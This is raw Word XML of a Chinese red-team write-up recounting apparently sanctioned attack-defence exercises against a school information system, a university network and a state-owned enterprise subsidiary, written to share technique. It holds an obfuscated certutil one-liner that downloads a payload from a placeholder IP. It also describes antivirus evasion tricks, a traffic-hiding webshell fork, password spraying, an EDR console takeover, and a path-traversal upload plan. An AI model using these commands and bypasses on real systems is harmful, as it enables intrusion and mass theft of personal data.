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4621F4" w14:textId="77777777" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>前言：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109146AA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     国护在即，最近大大小小各种攻防也参加了许多，有几个比较有意思的实战记录一下，想看与蓝队奇葩骂人技能的跳转到文末，由于内容敏感厚码见谅。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050A400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首先是某省教育护网，教育护网相较于金融通信行业会容易些，黑盒打点进内网的概率还是挺大的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B06F57" w14:textId="3B6F6A88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登录框开局，没验证码，用户有密码输入错误次数限制（固定弱口令密码爆破用户名） 运气很好～</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D2F2026" wp14:editId="131583D6">
            <wp:extent cx="5274310" cy="2524760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1495901110" name="图片 8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  但是是普通账户功能点很少（只有个人中心能打开。。） 点击获取基本信息抓包，通过keyvalue的值获取个人信息，并且在返回包里泄漏了创建用户的管理员userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F12580" wp14:editId="57BADE4F">
            <wp:extent cx="5274310" cy="2737485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="796926269" name="图片 7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替换keyvalue为管理员的userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65387537" wp14:editId="417B5EC2">
            <wp:extent cx="5274310" cy="2261235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="798549369" name="图片 7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得到管理员账户和密码，但是密码加了盐。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC2031" w14:textId="1FFE07D5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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F5B764" wp14:editId="15C41FA0">
            <wp:extent cx="5274310" cy="417195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="200061106" name="图片 7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BCB80" w14:textId="06C05E2C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不慌，解不开我们就改！既然获取账户的地方有越权那修改密码的地方呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A894D33" wp14:editId="2837FBB7">
            <wp:extent cx="5274310" cy="2615565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="515869427" name="图片 7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果不其然，上号上号</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50635726" wp14:editId="47BF189A">
            <wp:extent cx="5274310" cy="3289300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1211252261" name="图片 7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由于是该学校信息管理系统，得到全校全量学生多要素信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E131A6F" wp14:editId="35D6E3C9">
            <wp:extent cx="5274310" cy="3187065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="477363762" name="图片 7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而且还是net的系统后台，简简单单上传getshell（当时是绕了waf的，没截图了，用的非常规后缀加脏数据）</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE9CEB2" wp14:editId="5F5B6759">
            <wp:extent cx="5274310" cy="2884805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1557236726" name="图片 7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权限太低不给执行命令，由于是net的站大概率是mssql，找到配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DAB493F" wp14:editId="3285531B">
            <wp:extent cx="5274310" cy="2347595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="940754646" name="图片 7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正向代理出来连接数据库提权rce</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F25D3C6" wp14:editId="70F42B98">
            <wp:extent cx="5274310" cy="4100195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="828564597" name="图片 7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0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正向代理sou5的马一直被杀，最后是利用\u180冷门unicode编码+@字符混淆敏感方法名bypass的（感谢lvan1ee师傅）后来自己也深入学习了一下net免杀</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="393A1D42" wp14:editId="6B91B4A4">
            <wp:extent cx="5274310" cy="1157605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1861853633" name="图片 7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上线cs维权，刚好到饭点，同事喊去吃饭（以为学校应急不会很快</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05814E03" wp14:editId="0C189D34">
            <wp:extent cx="5274310" cy="3336290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1759402757" name="图片 6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回来发现进程没了，站直接被关了502（哭死）还好有数据分弥补一下。。。</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A9CDB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第二个目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F804F9B" w14:textId="0F40A3C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通过微信点对点钓鱼搞到统一门户账户密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9A852F" wp14:editId="4D9CB10A">
            <wp:extent cx="5274310" cy="3234055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="271557178" name="图片 6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痛苦黑盒挖洞功能点质检员捡漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF42979" wp14:editId="16BB9ED3">
            <wp:extent cx="5274310" cy="3423285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1763361748" name="图片 6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AC32E" w14:textId="7D2D9792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功夫不负有心人，osshell，并且机器是出网的</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E7F926" wp14:editId="5F05D0F1">
            <wp:extent cx="5274310" cy="3446780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1332497567" name="图片 6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上线cs的时候远程下载马子需要绕一下杀软</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E7555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复制certutil.exe到当前目录再用^和"进行混淆参数即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32080B81" w14:textId="77777777" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AE3498" w14:textId="77777777" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:r w:rsidRPr="00273864">
        <w:t>copy C:\windows\system32\certutil.exe xxx.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24982B" w14:textId="77777777" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EE614B" w14:textId="77777777" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:r w:rsidRPr="00273864">
        <w:t>xxx.exe -url""""ca^c^he -spl""""it -f http://xxx.xx.xx.xx/1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15175284" w14:textId="6434A4F4" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>上线cs抓主机密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="794DF9BF" wp14:editId="7579FEE6">
            <wp:extent cx="5274310" cy="8430895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="568502363" name="图片 6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lastRenderedPageBreak/>
        <w:t>抓浏览器密码，翻配置文件组成密码本 fscan密码喷洒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC54461" w14:textId="1C493BCD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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F731783" wp14:editId="16DC4B80">
            <wp:extent cx="5274310" cy="1910715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="814837861" name="图片 6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在之前的教训下，二开了fscan和哥斯拉</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD2072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哥斯拉隐匿流量：https://github.com/kong030813/Z-Godzilla_ekp 点点star</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A327BC6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fscan扫描到内网常见的漏洞就自动利用执行命令，如果出网就可以直接上线vshell等c2平台，被应急关掉机器也没关系，还有其他机器在线</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC323E9" w14:textId="6B269020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两分钟就上线了十几台机器（多为redis未授权和ssh弱口令）</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D59D1A2" wp14:editId="04CDEDC0">
            <wp:extent cx="5274310" cy="2694305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="987097911" name="图片 6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继续漏洞利用寻找新网段，数据库提权，利用web漏洞继续组成密码本碰洒</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39CC13E9" wp14:editId="08431FDE">
            <wp:extent cx="5274310" cy="3169285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1652084364" name="图片 6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发现目标单位采购了sxf的edr</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6524A63D" wp14:editId="77E840F2">
            <wp:extent cx="5274310" cy="3423285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="463214522" name="图片 6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通过内网edr进程和网络通信定位到了edr管理端ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0A4EC5" wp14:editId="67C26333">
            <wp:extent cx="5274310" cy="3517265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1341391079" name="图片 6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该系统有nday，尝试后都修复了 ，最终通过横向移动，拿到了这台机器的shell，能说密码碰洒yyds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52457856" w14:textId="4530B886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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="087CC8E4" wp14:editId="1EBFF542">
            <wp:extent cx="5274310" cy="4832985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1861665297" name="图片 5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3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65B26" w14:textId="13AE47E4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lastRenderedPageBreak/>
        <w:t>然后就是感谢这位sxf的同学发帖</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363386D4" wp14:editId="17F7ACD6">
            <wp:extent cx="5274310" cy="3269615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="776315915" name="图片 5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图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3ADD4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通过改密码拿下edr控制端，可通过下发脚本控制所有终端（路径分已经打满就没继续了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B05C81" w14:textId="1C310F33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有意思的是通到了校园网网段，怎么知道是校园网呢，如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C84F1A" wp14:editId="6169355D">
            <wp:extent cx="3634740" cy="760730"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="1751377708" name="图片 5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图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还有xxx的拯救者这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D9AD6E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其中有学生主机开放1433等端口弱口令，可拿下个人pc管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF5CBC" w14:textId="6D22A6AE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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C8F7B5A" wp14:editId="53CFFCD0">
            <wp:extent cx="5274310" cy="7496175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="579470457" name="图片 5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图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550DD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数据分就找核心业务的数据库 找到了his 加起来上千万数据（很多核心业务的数据库配置文件是加密的，需要分析源码解密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C33CE" w14:textId="1287071C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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177BFC8C" wp14:editId="3EFD327F">
            <wp:extent cx="5274310" cy="2367280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1504411817" name="图片 5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图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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A9439F7" wp14:editId="5A419BEE">
            <wp:extent cx="5274310" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="778272093" name="图片 5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图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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7380678F" wp14:editId="7DE2E281">
            <wp:extent cx="5274310" cy="3037205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="401465578" name="图片 5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图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lastRenderedPageBreak/>
        <w:t> 最终也是分数全部打满</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2011C6F2" wp14:editId="7B0207F5">
            <wp:extent cx="5274310" cy="697230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="78128947" name="图片 5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图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某次市护（最倒霉的一集，两次抽的目标都是各种没有互联网资产的单位）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC5A0D" w14:textId="6A57FFF3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对为数不多有互联网资产的某大型央企目标做渗透，burp被动插件扫的时候，居然有蓝队骂人（甲方爸爸请你来就是吸引仇恨的是吧）</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6509FE44" wp14:editId="0073823D">
            <wp:extent cx="5274310" cy="3804920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1140495131" name="图片 5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图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773FF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今天就咬着你啃了</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319DE37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收集到一处100%控股子公司的某管理系统，没验证码嘿嘿</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426EE95A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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB07D3" w14:textId="1FFC730D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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6C5410" wp14:editId="032AE76A">
            <wp:extent cx="5274310" cy="1934210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1976276090" name="图片 5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图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7F33B" w14:textId="343F3441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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E1D018" wp14:editId="1BAC18C6">
            <wp:extent cx="5274310" cy="3502025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="279486927" name="图片 4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图片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3864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用自己字典爆破无果，去js上找到了开发者的名字（此处没截图）然后用名字各种缩写组成账号和密码字典爆破</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEB0682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zyx/zyx@123（类似于这种）成功登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49658E88" w14:textId="6482A154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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F8D9E0" wp14:editId="34B6D127">
            <wp:extent cx="5274310" cy="2713990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1790639737" name="图片 4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图片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9C10F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直接找上传，后缀没限制，返回的路径是通过token传参不知道路径，研究了半天大概率是写到数据库里面了（后续sql注入也验证了这一点）</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F104B7E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直接让你执行sql语句这你受得了吗</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D01F4" w14:textId="76C12185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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCB1FD8" wp14:editId="6F56F9FC">
            <wp:extent cx="5274310" cy="2446020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2054950673" name="图片 4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图片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0DE1B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拿到了一些数据，然后osshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845A44E" w14:textId="5C53622E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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E918785" wp14:editId="1AA23837">
            <wp:extent cx="5274310" cy="2919095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1561943771" name="图片 4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图片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CE66D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小小蓝队不好好看设备来骂我是吧，好好好</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E0D63D" w14:textId="15D9FB3E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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1008E272" wp14:editId="63D24CD2">
            <wp:extent cx="3427095" cy="3449955"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1203439965" name="图片 4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图片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7B8B3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正要报仇时发现情况不对，第一次遇到如此恶劣的环境，站库分离的，数据库单独一个服务器，且不出网，没dns，没web服务，无法搭建代理进行内网渗透</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5A35D" w14:textId="47E38C36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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE3DCD2" wp14:editId="7C724C3C">
            <wp:extent cx="5274310" cy="5942965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="783385591" name="图片 4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图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4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8F5D6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只能再从web入手看看能不能拿到web服务器的权限，搭建正向代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059BDE6C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找到一处上传（直接上传到服务器附件目录，不上传到网站目录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B09A3E" w14:textId="7E6A407A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="239B40FA" wp14:editId="7BC63849">
            <wp:extent cx="5274310" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="973468695" name="图片 4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图片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A2186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对应为C:/目录名称/用户id/日期/随机，但是有了数据库权限用户id我们可控，可直接进数据库修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E850C30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通过跑数据库表中的内容获取到web目录：C:\inetpub\leaxxxxxxWeb\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131669A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初步构想修改用户id为../inetpub/learunWeb/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A01A1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这样上传后就是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D559B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lastRenderedPageBreak/>
        <w:t>C:/fileAnnexes/../inetpub/learunWeb//2024xxxx/wu_1hrrh8vdf6l03hlu7f1qll40v7.aspx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9E62A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===&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF9E57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C:/inetpub/learunWeb/2024xxxx/wu_1hrrh8vdf6l03hlu7f1qll40v7.aspx</w:t>
      </w:r>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9A5B94" w14:textId="2921794C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="161884C0" wp14:editId="323151F2">
            <wp:extent cx="5274310" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1514854291" name="图片 4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图片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80CCA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成功修改，但是现实很骨感，修改了account，jwt出了问题登录不了，上传是要鉴权的（需要拿到jwt密钥）但是当时已经在这个站点耗费了一天的时间了，最终也是放弃了，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CF7AEB" w14:textId="4E1CFCAD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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A969A1" wp14:editId="3617E79B">
            <wp:extent cx="3488690" cy="3603625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185737358" name="图片 4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图片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B8BE5" w14:textId="77777777" w:rsidR="00273864" w:rsidRPr="00273864" w:rsidRDefault="00273864" w:rsidP="00273864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00273864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不过有这些已经让防守方拿不到优秀防守单位奖了，也算是小小报仇了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77016E8E" w14:textId="77777777" w:rsidR="000A4909" w:rsidRPr="00273864" w:rsidRDefault="000A4909">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000A4909" w:rsidRPr="002738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33072E" w14:textId="77777777" w:rsidR="00BD57DA" w:rsidRDefault="00BD57DA" w:rsidP="00273864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B2BB80B" w14:textId="77777777" w:rsidR="00BD57DA" w:rsidRDefault="00BD57DA" w:rsidP="0027386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E5142F" w14:textId="77777777" w:rsidR="00BD57DA" w:rsidRDefault="00BD57DA" w:rsidP="00273864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="792AC9F9" w14:textId="77777777" w:rsidR="00BD57DA" w:rsidRDefault="00BD57DA" w:rsidP="0027386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7D1797"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43941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007496"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F950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2620597">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="432896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bordersDoNotSurroundHeader/>
  <w:bordersDoNotSurroundFooter/>
  <w:defaultTabStop w:val="420"/>
  <w:drawingGridHorizontalSpacing w:val="181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A00"/>
    <w:rsid w:val="000A4909"/>
    <w:rsid w:val="00273864"/>
    <w:rsid w:val="006A6F96"/>
    <w:rsid w:val="00BD57DA"/>
    <w:rsid w:val="00FB1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7DFA77AC-6C86-4723-BE30-4F83B315B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386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7386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738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7386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2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347</Words>
  <Characters>1984</Characters>
  <Application>Microsoft Office Word</Application>
